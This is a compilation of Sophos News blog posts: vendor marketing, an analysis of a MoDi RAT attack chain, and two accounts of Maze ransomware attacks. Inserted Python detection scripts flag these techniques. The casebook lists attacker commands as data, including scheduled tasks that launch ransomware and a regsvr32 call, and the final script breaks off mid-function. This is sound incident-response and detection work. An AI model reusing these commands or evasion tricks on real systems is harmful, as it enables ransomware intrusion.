Managed Detection and Response (MDR) Buyers Guide – Sophos News

Download the free MDR Services Buyers Guide today!

Few organizations have the resources in house to effectively manage their security programs while proactively defending against new and emerging threats.

As a result, organizations are looking to managed detection and response (MDR) services to run their security operations programs.

However, the security services marketplace is relatively new and is filled with false claims and confusing jargon.

Our MDR Buyers Guide is available as a PDF or in audio format and provides clarity by walking you through the key considerations when choosing an MDR service. It also enables you to see how MDR providers stack up against one another.

Evaluating MDR providers: 12 questions to ask

When evaluating an MDR provider, we recommend asking the following:

  1. How many customers does the MDR service have?

The current customer count will give you an idea of how many other organizations trust the service provider, and how well-versed they are at responding to suspicious activity.

  2. What is the scope of the service? Is threat response included?

Most vendors focus on threat identification and notification, leaving response and remediation to the customer. Effective MDR services go far beyond this. Ask for clarity on what is offered.

  3. Is the service 24/7/365? If an issue arises at 2AM on a Sunday, who will respond?

Ensure the MDR service truly monitors your environment and is able to respond any time, day or night.

  4. Which technologies does the service utilize? Are they included in the price?

Ask if the technology used by the operators is included in the price of the service or if you must purchase your own tools separately.

  5. Is the service being provided proactive or reactive?

MDR is a proactive discipline. Ensure you’re not being offered digital forensics and incident response services, typically used to deal with an existing crisis.

  6. How will you interact with the MDR team?

Is there direct call-in support? Can you communicate via email? Speak directly with SOC analysts, or through an intermediary?

  7. What is the security operations threat detection and response (TDR) methodology?

MDR providers should have a well-defined TDR methodology. If not, they’ll likely struggle to scale as their business grows and will be more likely to miss important indicators of suspicious activity.

  8. How fast is the service?

In security, seconds matter. MDR providers should be able to estimate the average times to detect, respond, and resolve.

  9. What types of remediation actions can the MDR operators take? Can they take active response for you?

Find out what happens when the service detects suspicious activity. Many will simply monitor and notify you. They should be able to act on your behalf and provide response.

  10. Is threat hunting lead-driven (responding to alerts), lead-less (looking for new indicators of attack without alerts), or both?

Some vendors refer to automated alert generation as threat hunting (it’s not). Understand if the MDR operators will proactively hunt to detect adversaries in your environment regardless of whether or not they’ve detected a strong indicator of activity or compromise.

  11. What data sources are used to provide visibility? Is the service just “managed EDR”?

While endpoint data is critical for a security operation program, some MDR providers don’t have any additional visibility beyond the endpoint. These are not true MDR providers but rather “managed EDR” services.

  12. Does the MDR provider have access to threat intelligence and threat researchers?

MDR providers should have a level of expertise that goes beyond what most organizations can build independently: skilled security analysts, access to proprietary threat intelligence, and collaboration with threat researchers when something novel is detected.

These questions and a comprehensive vendor comparison are covered in our MDR Buyers Guide – available as a PDF or in audio format.

Give your organization the best protection with Sophos Managed Threat Response (MTR)

Sophos MTR provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service. Beyond simply notifying you of attacks or suspicious behaviors, the Sophos MTR team takes targeted actions on your behalf to neutralize even the most sophisticated and complex threats.

The Sophos MTR team of threat hunters and response experts:

  • Proactively hunt for and validate potential threats and incidents
  • Use all available information to determine the scope and severity of threats
  • Apply the appropriate business context for valid threats
  • Initiate actions to remotely disrupt, contain, and neutralize threats
  • Provide actionable advice for addressing the root cause of recurring incidents

Visit Sophos.com/MTR today to learn more.

DOWNLOAD: ‘MDR Buyers Guide’ full report

Net Universe offers all Sophos devices and subscriptions, as well as consultant services, with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.

XG Firewall is Nutanix AHV and Nutanix Flow Ready – Sophos News

Sophos XG Firewall has joined the robust and growing Nutanix ecosystem that is enabling global enterprises to converge and virtualize their IT infrastructure.

XG Firewall is now Nutanix AHV and Nutanix Flow ready to provide protection for networked applications and traffic in Nutanix virtualized environments. XG Firewall delivers the same kind of easy deployment, management and performance that Nutanix AHV is known for.

Nutanix is the industry leader in hyperconverged infrastructure (HCI) that makes the underlying datacenter and cloud infrastructure invisible, abstracting and elevating it to enable businesses to focus on their applications and services. The Nutanix AHV hypervisor converges private, public, and distributed clouds, bringing simplicity and agility to infrastructure management.

XG Firewall v18 with the new Xstream Architecture running on Nutanix AHV provides deeper visibility into applications, network activity, and threats – able to stop even previously unseen attacks.

Nutanix Flow is a software defined network policy engine built into AHV that provides easy and granular policy-driven application micro-segmentation.

XG Firewall has been validated to provide two modes of operation within Nutanix AHV infrastructure:

  1. XG Firewall can provide standard NGFW protection on Nutanix AHV similar to any other physical, virtual, cloud, or hybrid network.
  2. In addition, non-IP bridge mode in XG can be used within the network as part of Nutanix Flow’s micro-segmentation to transparently redirect VM traffic through a virtual XG Firewall running in bridge mode on every AHV host to protect east-west traffic.

XG Firewall can protect traffic entering and leaving the Nutanix AHV infrastructure while also securing traffic moving within the Nutanix Flow software defined network, taking advantage of the granular redirection capabilities of Nutanix Flow micro-segmentation that ensures security protection policies are optimized for individual applications.

XG Firewall’s full suite of protection capabilities will help secure Nutanix applications and network traffic flows, including TLS inspection, intrusion prevention, application control, web protection and filtering, and zero-day threat protection with sandboxing and threat intelligence.

Visit Sophos.com/Firewall to learn more about XG Firewall products.

Sophos to be included in the 2020 MITRE Engenuity ATT&CK®️ Evaluations for Enterprise – Sophos News

We are pleased to announce that Sophos is participating in the 2020 MITRE Engenuity ATT&CK Evaluations for Enterprise Carbanak and FIN7 evaluation with Sophos Intercept X.

The evaluation tests the detection capabilities of endpoint protection and endpoint detection and response (EDR) solutions. The 2020 test utilizes techniques common to the Carbanak and FIN7 threat groups.

MITRE Engenuity states:

These groups carry a firm reputation of utilizing innovative tradecraft. Efficient espionage and stealth are at the forefront of their strategy, as they often rely heavily on scripting, obfuscation, “hiding in plain sight,” and fully exploiting the users behind the machine while pillaging an environment. They also leverage a unique spectrum of operational utilities, spanning both sophisticated malware as well as legitimate administration tools capable of interacting with various platforms (Windows and Linux, including point-of-sale specific technologies).

Carbanak is known for targeting banks, and FIN7 is known for targeting the U.S. retail, restaurant, and hospitality sectors.

This year an optional Protections scenario is also available as part of testing, which Sophos has also chosen to participate in. MITRE Engenuity expects the results and methodology to be available early in 2021.

For more information on the 2020 MITRE Engenuity ATT&CK Evaluations for Enterprise Carbanak and FIN7 evaluation, read MITRE Engenuity’s blog and testing overview.

Email-delivered MoDi RAT attack pastes PowerShell commands – Sophos News

SophosLabs researchers Fraser Howard and Andrew O’Donnell stumbled upon an unusual reflective loader attack method last month while hunting through threat telemetry. The attack chain started with a malicious email message that contained some hostile VB scripting code, and concluded by delivering a commodity remote access Trojan named MoDi RAT.

These kinds of detections often lead to interesting, divergent attacks, which is what the detection teams are looking for. Diving down the rabbit hole, Howard and O’Donnell discovered a few intriguing twists to the convoluted attack, which included a Scheduled Task that starts a Visual Basic Script file that, in turn, launches PowerShell and then literally pastes the text of the commands into the PowerShell window, rather than passing the command string as a parameter.

But let’s not get ahead of ourselves. Here is Howard’s root cause analysis (RCA) of the attack chain.

AMSI vs. MoDi RAT

The attack analysis pivoted on some of the data collected from Sophos endpoint products using Microsoft’s Antimalware Scan Interface (AMSI). The root cause of the attack triggered our telemetry: a malicious script, delivered (most likely) via spam. In the example below, the user’s browser (Edge, highlighted in red below) started the attack chain, which you can see in this snippet of the threat case.

The attack begins when a recipient of the malspam opens the message attachment. The Visual Basic Script in the message attachment connects to a remote site, which is the entry point into a series of HTTP 302 redirects that eventually lead to a .Zip archive, hosted in OneDrive cloud storage, that contains an encoded VBS (VBE) file. 

With the VBE file in hand, we set about reproducing the entire attack to get a complete picture, right through to the payload.

The initial VBScript writes out a second VBS file to the filesystem, and inserts three new entries into the Windows Registry that contain binary data, written out as 8-digit binary numbers. It then launches a system utility to create a new Scheduled Task that, at a predetermined time in the future, launches the VBS script.

When the Scheduled Task runs, it uses wscript.exe to launch the VBS. The VBS code launches PowerShell and then runs this code, which takes data from the VBS and inserts it into the system’s clipboard, where it can then programmatically “paste” the commands into the PowerShell window using the VBS SendKeys command.

This neat little trick for delivering the PowerShell commands seems designed to evade detection: it keeps the commands under the radar rather than spawning an instance of PowerShell with interesting command-line parameters that might trigger all sorts of security product alerts. From this point on, the attack is fileless.

In the next step, PowerShell extracts a .NET decoder executable from one of the Registry blobs (labeled Entreur in the Registry) that the VBE had created earlier, and reflectively loads it by injecting it into a system process.

The decoder executable, in turn, extracts the .NET injector and payload blobs (labeled in the Registry as inj and Myfile, respectively) from the Registry. Then the injector loads the payload (injecting into the host application, msbuild.exe).
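Two defender-side checks for the chain described above, written as an added example (not SophosLabs’ code): a process-lineage rule that flags PowerShell spawned by a script host with an empty command line, where the usual command-line signatures see nothing, and a decoder that turns Registry string values made of 8-digit binary numbers back into bytes and flags those that begin with a PE (“MZ”) header. The telemetry records and Registry values are constructed samples; the value names Entreur, inj and Myfile come from the article.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event 1 / EDR style)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _has_arguments(cmdline: str) -> bool:
    """True if the command line carries anything beyond the program token itself."""
    m = re.match(r'^(?:"[^"]*"|\S+)\s*(.*)$', cmdline.strip())
    return bool(m and m.group(1).strip())


def flag_pasted_powershell(events: List[ProcEvent]) -> List[int]:
    """PIDs of PowerShell processes that a script host started with no arguments.

    With commands pasted into the console, the command line is empty; the
    lineage (wscript/cscript -> argument-less PowerShell) is the signal.
    """
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if _basename(e.image) not in POWERSHELL:
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or _basename(parent.image) not in SCRIPT_HOSTS:
            continue
        if not _has_arguments(e.cmdline):
            hits.append(e.pid)
    return hits


BINARY_STRING = re.compile(r"^(?:[01]{8})+$")


def decode_binary_string(value: str) -> bytes:
    """Turn a run of 8-digit binary numbers ('01001101...') back into bytes."""
    if not BINARY_STRING.match(value):
        raise ValueError("not a run of 8-digit binary groups")
    return bytes(int(value[i:i + 8], 2) for i in range(0, len(value), 8))


def suspicious_registry_values(values: Dict[str, str], min_bytes: int = 64) -> List[str]:
    """Names of string values that decode from 8-digit binary into a PE image (MZ header)."""
    hits = []
    for name, data in values.items():
        if not isinstance(data, str) or not BINARY_STRING.match(data):
            continue
        blob = decode_binary_string(data)
        if len(blob) >= min_bytes and blob[:2] == b"MZ":
            hits.append(name)
    return hits


def _to_binary_string(raw: bytes) -> str:
    return "".join(f"{b:08b}" for b in raw)


# Constructed sample telemetry: task scheduler service -> wscript.exe -> bare powershell.exe,
# plus a benign PowerShell launched from Explorer with a script argument.
SAMPLE_EVENTS = [
    ProcEvent(400, 4, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p -s Schedule"),
    ProcEvent(1201, 400, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\AppData\Roaming\upd.vbs"'),
    ProcEvent(1350, 1201, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    ProcEvent(2000, 700, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2100, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
]

# Constructed stand-in for a PE header (64 bytes) encoded the way the article describes.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60
SAMPLE_REGISTRY = {
    "Entreur": _to_binary_string(FAKE_PE),
    "inj": _to_binary_string(FAKE_PE),
    "Myfile": _to_binary_string(FAKE_PE),
    "Theme": "dark",        # ordinary string value
    "Counter": "00000001",  # binary-looking but a single byte, not a PE
}

if __name__ == "__main__":
    print("argument-less PowerShell under a script host:", flag_pasted_powershell(SAMPLE_EVENTS))
    print("registry values holding a PE image:", suspicious_registry_values(SAMPLE_REGISTRY))
```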

Notably, the initial Zip payload name (“Timbres-electroniques”) and several other strings, including the Entreur Registry key were comprised of words from the French language. Some of the targets of these attacks were French firms.

The diagram below summarizes all this and illustrates the key components of the attack chain.

The three .NET executable layers (decoder, injector, and payload) do not touch the disk, but we proactively blocked the attack based on our recognition of the technique the attackers employ to deliver the payload filelessly.

Despite already proactively blocking this attack, as a result of our further investigation we were able to enhance existing detections to provide additional resilience against similar attacks we might see in the future.

Why you should upgrade from older Windows

Microsoft’s AMSI framework that helps us intercept and neutralize these kinds of attacks is only available on certain recent flavors of Windows (Windows 10, Windows Server 2016 and Windows Server 2019). If there’s one single reason why users of older versions of Windows should upgrade, it’s this: AMSI protection is crucial to helping us defend against many of today’s attacks, particularly those that use fileless techniques.

This attack typifies how most of the fileless attacks that we see work. AMSI provides the capability for Sophos to proactively protect customers against a range of similar attacks, and the telemetry we’re able to get lets us dive into these rabbit holes so we can identify and enhance our protections more effectively.

Sophos endpoint products will detect the components of this attack as AMSI/Reflect-D, Troj/VBSInj-D, and AMSI/ModiRat-A.

Indicators of compromise

IoCs relating to this investigation have been posted to the SophosLabs Github.

Blocking a $15 million Maze ransomware attack – Sophos News

Customer profile: An organization with many hundreds of networked devices based in Asia Pacific.

The Sophos Managed Threat Response (MTR) team was called in to help an organization targeted with Maze ransomware. The attackers issued a ransom demand for US$15 million – if they had succeeded this would have been one of the most expensive ransomware payments to date.

Background: Ransomware partners in crime

Maze is one of the most notorious ransomware families, active since 2019 when it evolved from ChaCha ransomware. It was among the first to combine data encryption with information theft.

The operators behind Maze have recently started colluding with other ransomware groups, including LockBit, SunCrypt and Ragnar Locker, providing them with access to their platform for posting stolen victim data.

This appears to have led to a reciprocal sharing of tactics, techniques and procedures (TTPs): in the attack covered here the Maze group borrowed a Ragnar Locker technique that involves using virtual machines.

For detailed technical analysis of this collaboration between attackers read Maze attackers adopt Ragnar Locker virtual machine technique.

Days 1-3: The attack begins

Prior to the attack becoming active, the operators compromised a computer on the target’s network. This computer was then used as a beachhead in the network. On multiple occasions during the attack, the attackers connected from here to other computers over Remote Desktop Protocol (RDP).

On day three, the main part of the attack began. The attackers exploited a domain admin account with a weak password to take control of an unprotected Domain Controller (DC). They then spent several days moving across the network.

Using the legitimate network scanning tool Advanced IP Scanner to map the network, the attackers created lists of IP addresses to which they would later deploy ransomware. These included a list of the IP addresses of machines belonging to the target’s IT administrators.

The attackers’ attention then turned to the exfiltration of data.

They identified a file server and accessed it remotely over RDP using the compromised domain admin account. Using the legitimate archiving tools WinRAR and 7-Zip, they started compressing folders located on it.

These archives were then copied back to the primary DC using the legitimate Total Commander FTP client that the attackers had installed on the file server.

The attackers tried to install the cloud storage application Mega on the DC. This was blocked as the target had added Mega to their blocked list using the application control capability in Sophos Intercept X endpoint protection. The attackers then switched to using the web-based version instead, uploading the compressed files.

Days 4-5: The calm before the storm

For two days, the attackers went quiet. It’s likely they were waiting for a day when the target’s IT security team wouldn’t be working, like the weekend.

Day 6: The first ransomware attack is launched

The first Maze ransomware attack was launched on a Sunday, using the already compromised domain admin account and the lists of IP addresses that had been identified.

This first attack actually comprised three attacks as the operators deployed three copies of the Maze ransomware via batch scripts to the targeted computers:

  • C:\ProgramData\enc6.exe
  • C:\ProgramData\enc.exe
  • C:\ProgramData\network.dll

Three scheduled tasks were created to execute the ransomware:

  Name                               Command
  Windows Update Security Patches    C:\ProgramData\enc6.exe
  Windows Update Security Patches 5  C:\ProgramData\enc.exe
  Windows Update Security            regsvr32.exe /i c:\programdata\network.dll

Over 700 computers were targeted in the attack, which was detected and blocked by Sophos Intercept X.

Either the attackers didn’t realize the attack had been blocked or they were hoping that the theft of the data would be enough for the target to pay up – but whatever the reason, upon launching the first attack attempt they issued a ransom demand for US$15 million.

Day 7: The MTR team gets to work

Realizing that they were under attack, the target’s security team engaged the advanced incident response skills of the Sophos MTR team. The team quickly identified the compromised admin account, identified and removed several malicious files, and blocked attacker commands and C2 (command and control) communications.

Day 8: Investigation and neutralization continue

Over the following hours the MTR team found further tools and techniques used by the attackers, as well as evidence relating to the exfiltration of data. More files and accounts were blocked.

Day 9: The second attack

The attackers launched a second attack via a different compromised account. This attack was similar to the first one: commands were executed on a DC, looping through the lists of IP addresses contained in txt files.

However, this time they copied a file called license.exe to C:\ProgramData:

This was followed by a scheduled task to execute it. In this attack attempt the task was called “Google Chrome Security Update”:

The attack was quickly identified and stopped. Intercept X detected the ransomware, and the MTR team disabled and deleted both the compromised account and the license.exe file. No files were encrypted.
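A scheduled-task triage check covering both the first attack’s three tasks and the second attack’s “Google Chrome Security Update” task, written as an added example (not the Sophos MTR team’s tooling). It flags tasks whose action runs a file dropped directly in the root of %ProgramData%, tasks that use regsvr32 /i to register a DLL from an untrusted location, and vendor-update lookalike names whose action does not live under Windows or Program Files. The task records are constructed samples modelled on the names and paths the casebook gives, plus two benign tasks for contrast.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# A file sitting directly in C:\ProgramData\ (no vendor subfolder) is where the
# casebook's payloads were dropped; legitimate installers use subfolders.
PROGRAMDATA_ROOT = re.compile(r"^[a-z]:\\programdata\\[^\\]+$", re.I)
TRUSTED_DIRS = re.compile(r"^[a-z]:\\(windows|program files( \(x86\))?)\\", re.I)
# Task names that borrow a vendor name plus "update"/"security" in either order.
LOOKALIKE = re.compile(
    r"\b(windows|google|chrome|microsoft)\b.*\b(update|security)\b"
    r"|\b(update|security)\b.*\b(windows|google|chrome|microsoft)\b", re.I)
# Quoted paths (may contain spaces) or bare drive-letter paths.
PATH_RE = re.compile(r'"([a-zA-Z]:\\[^"]+)"|([a-zA-Z]:\\\S+)')


@dataclass
class ScheduledTask:
    name: str
    command: str  # the task action as written in the task definition


def extract_paths(command: str) -> List[str]:
    """All drive-letter paths in a task action (the program and any file arguments)."""
    return [quoted or bare for quoted, bare in PATH_RE.findall(command)]


def triage_task(task: ScheduledTask) -> List[str]:
    """Reasons a task deserves a closer look; empty list means nothing matched."""
    reasons = []
    paths = extract_paths(task.command)
    tokens = task.command.strip().lower().split()
    in_trusted_dir = any(TRUSTED_DIRS.match(p) for p in paths)
    if any(PROGRAMDATA_ROOT.match(p) for p in paths):
        reasons.append("action runs a file dropped in the root of %ProgramData%")
    if tokens and tokens[0].startswith("regsvr32") and "/i" in tokens and not in_trusted_dir:
        reasons.append("regsvr32 /i registers a DLL from an untrusted location")
    if LOOKALIKE.search(task.name) and not in_trusted_dir:
        reasons.append("vendor-update lookalike name but action not under Windows/Program Files")
    return reasons


def triage_tasks(tasks: List[ScheduledTask]) -> Dict[str, List[str]]:
    """Map of task name -> reasons, for every task that raised at least one reason."""
    findings = {}
    for task in tasks:
        reasons = triage_task(task)
        if reasons:
            findings[task.name] = reasons
    return findings


# Constructed sample: the four task definitions described in the casebook plus two benign ones.
SAMPLE_TASKS = [
    ScheduledTask("Windows Update Security Patches", r"C:\ProgramData\enc6.exe"),
    ScheduledTask("Windows Update Security Patches 5", r"C:\ProgramData\enc.exe"),
    ScheduledTask("Windows Update Security", r"regsvr32.exe /i c:\programdata\network.dll"),
    ScheduledTask("Google Chrome Security Update", r"C:\ProgramData\license.exe"),
    ScheduledTask("GoogleUpdateTaskMachineUA",
                  r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler'),
    ScheduledTask("Backup", r"C:\Windows\System32\wbadmin.exe start backup -quiet"),
]

if __name__ == "__main__":
    for name, reasons in triage_tasks(SAMPLE_TASKS).items():
        print(name)
        for r in reasons:
            print("   -", r)
```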

Day 9: Third time lucky?

Just a few hours after the second attempt, the attackers tried again.

By now they seemed to be growing desperate. This attack targeted a single machine, the main file server that the exfiltrated data had been taken from, and used a completely different technique to the previous attacks.

In the third attempt, the attackers distributed the ransomware payload inside a virtual machine (VM).

Fortunately the MTR investigators recognized this new approach immediately as they had also responded to the Ragnar Locker ransomware attack where the technique was first seen.

The Maze operators had enhanced the technique, but it was undoubtedly the same. The attack was detected and stopped and no files were encrypted.

Defeating adversaries in human-led attacks

This casebook highlights how agile and adaptable human-operated attacks can be, with the attackers able to quickly substitute and reconfigure tools and return to the ring for another round. It also demonstrates how, to minimize the likelihood of detection, attackers take advantage of multiple legitimate IT tools in their attacks.

Sophos endpoint products detect components of this attack as Troj/Ransom-GAV or Troj/Swrort-EG. Indicators of compromise can be found on the SophosLabs Github.

What can defenders do?

The most important things an IT security team can do are to reduce the attack surface, implement strong security software (including specialist anti-ransomware protection), educate employees, and consider setting up or engaging a human threat hunting service to spot the clues that software can’t.

Any organization can be a ransomware target, and any spam or phishing email, exposed RDP port, vulnerable exploitable gateway device or stolen remote access credentials will be enough for such adversaries to gain a foothold.

MITRE ATT&CK Mapping

The MITRE ATT&CK framework is a globally accessible knowledge base of known adversary tactics, techniques and procedures (TTPs). It can help security teams as well as threat hunters and analysts to better understand, anticipate and mitigate attacker behavior.

Initial Access

  • T1078.002 – Valid Accounts: Domain Accounts
  • T1133 – External Remote Services

Execution

  • T1059.001 – Command and Scripting Interpreter: PowerShell
  • T1059.003 – Command and Scripting Interpreter: Windows Command Shell
  • T1047 – Windows Management Instrumentation
  • T1053.005 – Scheduled Task/Job: Scheduled Task

Defense Evasion

  • T1564.006 – Hide Artifacts: Run Virtual Instance

Credential Access

Discovery

  • T1016 – System Network Configuration Discovery

Lateral Movement

  • T1021.001 – Remote Services: Remote Desktop Protocol
  • T1021.002 – Remote Services: SMB/Windows Admin Shares

Command & Control

  • T1071.001 – Application Layer Protocol: Web Protocols

Exfiltration

  • T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage

Impact

  • T1486 – Data Encrypted for Impact

Sophos Managed Threat Response and threat hunting

For more information on the Sophos MTR service visit our website or speak with a Sophos representative.

If you prefer to conduct your own threat hunts Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Start a 30-day no obligation trial today.

Introducing Sophos Techvids, a large library of helpful support videos – Sophos News

We’re excited to announce the launch of our new Sophos Techvids video hub!

This new platform features our extensive video library (90+ and counting!) of how-to, configuration, and troubleshooting videos, and improves the viewing experience by introducing new and interactive features such as in-video surveys and easy-to-use navigational elements.

Check out: https://techvids.sophos.com

Interactive in-video features

Feedback surveys: In-video prompts and surveys provide an easy way to share your feedback to help us improve future videos.

Interactive video navigation: Available on most of our current videos, the navigational top-bar is interactive. Click to skip directly to the section of the video you want to view.

Not sure where to start? Here are our most popular videos:

Check out the entire collection at https://techvids.sophos.com today!

How NIST and eIDAS revisions are shaping the future of e-identification

Net Universe offers all Yubikeys with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/yubikey.

Sophos is named a Leader in IDC’s mobile threat management report – Sophos News

We are proud to announce that Sophos has been recognized as a Leader in the IDC MarketScape: Worldwide Mobile Threat Management Software 2020 Vendor Assessment.

The report provides an overview of mobile threat management (MTM) security solutions, also referred to as mobile threat defense (MTD) solutions – an increasingly important security market segment now that a more mobile workforce is doing more work on mobile devices than ever.

We believe this placement for Sophos Intercept X for Mobile is a testament to the strength of the Intercept X deep learning engine used across Sophos’ endpoint security range of products. Together with the flexibility of strong management and security capabilities in Sophos Central, the cloud-based management platform for all Sophos products lets organizations manage their mobile, endpoint, server, and network security in the same console.

Furthermore, we believe that this placement is due to Intercept X for Mobile’s seamless integration with the powerful endpoint management capabilities of Sophos Mobile, giving organizations the best of both worlds for mobile threat management (MTM) and unified endpoint management (UEM).

According to the report, “Sophos’ combination of MTM and UEM products is rare among MTM vendors and unique among vendors in this study.”

Intercept X for Mobile is available for Android, iOS, and Chrome OS and offers users world-class device, network, and app security, protecting against the latest mobile threats such as ransomware, network attacks, and exploits. According to the report, “This combination [of MTM and UEM] gives Sophos a strong advantage in situations where enterprises want a single vendor for both mobile device management and security enforcement.”

Sophos Intercept X for Mobile also integrates with a broad range of third-party platforms, including Microsoft Intune and other top UEM vendors – providing organizations with a flexible solution to protect against mobile threats within their unique existing security infrastructures.

To learn more about Intercept X for Mobile, head over to Sophos.com or download and try it for yourself at Google Play or the App Store.

Maze attackers adopt Ragnar Locker virtual machine technique – Sophos News

While conducting an investigation into an attack in July in which the attackers repeatedly attempted to infect computers with Maze ransomware, analysts with Sophos’ Managed Threat Response (MTR) discovered that the attackers had adopted a technique pioneered by the threat actors behind Ragnar Locker earlier this year, in which the ransomware payload was distributed inside of a virtual machine (VM).

In the Maze incident, the threat actors distributed the file-encrypting payload of the ransomware on the VM’s virtual hard drive (a VirtualBox virtual disk image (.vdi) file), which was delivered inside of a Windows .msi installer file more than 700MB in size. The attackers also bundled a stripped-down, 11-year-old copy of the VirtualBox hypervisor inside the .msi file, which runs the VM as a “headless” device, with no user-facing interface.

The Maze-delivered virtual machine was running Windows 7, as opposed to the Windows XP VM distributed in the Ragnar Locker incident. A threat hunt through telemetry data initially indicated the attackers may have been present on the attack target’s network for at least three days prior to the attack beginning in earnest, but subsequent analysis revealed that the attackers had penetrated the network at least six days prior to delivering the ransomware payload.

The investigation also turned up several installer scripts that revealed the attackers’ tactics, and found that the attackers had spent days preparing to launch the ransomware by building lists of IP addresses inside the target’s network, using one of the target’s domain controller servers, and exfiltrating data to cloud storage provider Mega.nz.

The threat actors initially demanded a $15 million ransom from the target of the attack. The target did not pay the ransom.

How the attack transpired

Subsequent analysis by the MTR team revealed that the attackers orchestrated the attack using batch files, and made multiple attempts to maliciously encrypt machines on the network. In the first iteration, the ransomware payloads were all copied to the root of the %programdata% folder, using the filenames enc.exe, enc6.exe, and network.dll. The attackers then created scheduled tasks that would launch the ransomware, with names based on variants of Windows Update Security or Windows Update Security Patches.

The initial attack did not produce the desired result. The attackers made a second attempt, with a ransomware payload named license.exe, launched from the same location. But before they launched it, they executed a script that disabled Windows Defender’s Real-Time Monitoring feature.

The attackers then, once again, executed a command that would create a scheduled task on each computer they had copied the license.exe payload to, this time named Google Chrome Security Update, and set it up to run once at midnight (in the local time zone of the infected computers).

Sophos analysts started to see detections indicating that the malware was triggering the CryptoGuard behavioral protections of Intercept X; these detections show that the ransomware payloads were being caught and quarantined on machines protected by Sophos endpoint products before they could cause harm. In this case, CryptoGuard prevented the malware from encrypting files by intercepting and neutralizing the Windows APIs that the ransomware was attempting to use to encrypt the hard drive.

So the attackers decided to try a more radical approach for their third attempt.

Weaponized virtual machine

The Maze attackers delivered the attack components for the third attack in the form of an .msi installer file. Inside of the .msi was an installer for both the 32-bit and 64-bit versions of VirtualBox 3.0.4. This version dates back to 2009 and is still branded with its then-publisher’s name, Sun Microsystems.

The .msi also contains a 1.9GB (uncompressed) virtual disk named micro.vdi, which itself contains a bootable partition of Windows 7 SP1, and a file named micro.xml that contains configuration information for the virtual hard drive and session.

The root of that virtual disk contained three files associated with the Maze ransomware: preload.bat, vrun.exe, and a file just named payload (with no file extension), which is the actual Maze DLL payload.

The DLL file carries a different internal name of its own.

The preload.bat file (shown below) changes the computer name of the virtual machine, generating a series of random numbers to use as the name, and joins the virtual machine to the victim organization's network domain using the WMI command-line utility.

The virtual machine was apparently configured in advance by someone who knew something about the victim's network, because its configuration file (micro.xml) maps two drive letters that this particular organization uses for shared network drives, presumably so the VM can encrypt the files on those shares as well as on the local machine. It also creates a folder named C:\SDRSMLINK and shares it with the rest of the network.

At some point (it is unclear exactly when and how), the malware also writes out a file named startup_vrun.bat. We found this file in c:\users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Startup, which makes it a persistence mechanism that relies on the computer rebooting before the attackers launch the malware.

The script copies the same three files found on the root of the VM disk (the vrun.exe binary, the payload DLL, and the preload.bat batch script) to other disks, then issues a command to shut down the computer immediately. When the computer is powered on again, the script runs vrun.exe.

The C:\SDRSMLINK folder, created when the .msi file first runs, acts as a clearinghouse for the specific folders the malware wants to reach. It is full of symbolic links (symlinks, similar to Windows shortcuts) to folders on the local hard drive.
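Before anyone boots a dropped VM like this one, a responder wants two answers from the package alone: is that large file really a VirtualBox disk image, and which host paths does the VM's configuration hand to the guest for writing (which is what lets ransomware inside the VM reach files outside it). The following Python is an added example, not Sophos' code or anything recovered from the Maze package. It assumes that a VDI carries the VirtualBox signature 0xBEDA107F as a little-endian 32-bit value at offset 0x40, and that shared folders appear as SharedFolder elements (with name, hostPath and writable attributes) somewhere in the machine XML; the sample XML, its namespace, names and paths are constructed for the example.

```python
"""Added example, not Sophos' or the Maze operators' code: triage a VirtualBox
disk image and machine XML (the micro.vdi / micro.xml pair) before the VM runs.

Assumptions of this example (not stated in the article):
  * a VDI carries an ASCII banner in its first 64 bytes and the VirtualBox
    signature 0xBEDA107F as a little-endian u32 at offset 0x40;
  * shared folders appear as <SharedFolder name= hostPath= writable=> elements
    in the machine XML, under whichever namespace that VirtualBox version used.
"""
import os
import struct
import tempfile
import xml.etree.ElementTree as ET

VDI_SIGNATURE = 0xBEDA107F  # VirtualBox disk image header signature (assumed constant)


def is_vdi(path):
    """True if the file's header carries the VDI signature, whatever it is named."""
    try:
        with open(path, "rb") as fh:
            header = fh.read(0x44)
    except OSError:
        return False
    if len(header) < 0x44:
        return False
    (sig,) = struct.unpack_from("<I", header, 0x40)
    return sig == VDI_SIGNATURE


def write_fake_vdi(path):
    """Write a header-only stand-in for a VDI (constructed test data, not a real disk)."""
    banner = b"<<< Sun VirtualBox Disk Image >>>\n".ljust(0x40, b"\x00")
    with open(path, "wb") as fh:
        fh.write(banner + struct.pack("<I", VDI_SIGNATURE) + struct.pack("<I", 0x00010001))


def demo_vdi_check():
    """Run is_vdi on a fake VDI and on a plain file; returns (True, False)."""
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, "payload.bin")   # deliberately not named *.vdi
        plain = os.path.join(tmp, "notes.vdi")    # extension lies the other way
        write_fake_vdi(fake)
        with open(plain, "wb") as fh:
            fh.write(b"just text, no VirtualBox header" + b"\x00" * 0x40)
        return is_vdi(fake), is_vdi(plain)


def shared_folders(xml_text):
    """List the shared folders declared in a VirtualBox machine XML.

    Strips the namespace from every tag so the same code reads innotek-, Sun-
    and Oracle-era files.
    """
    root = ET.fromstring(xml_text)
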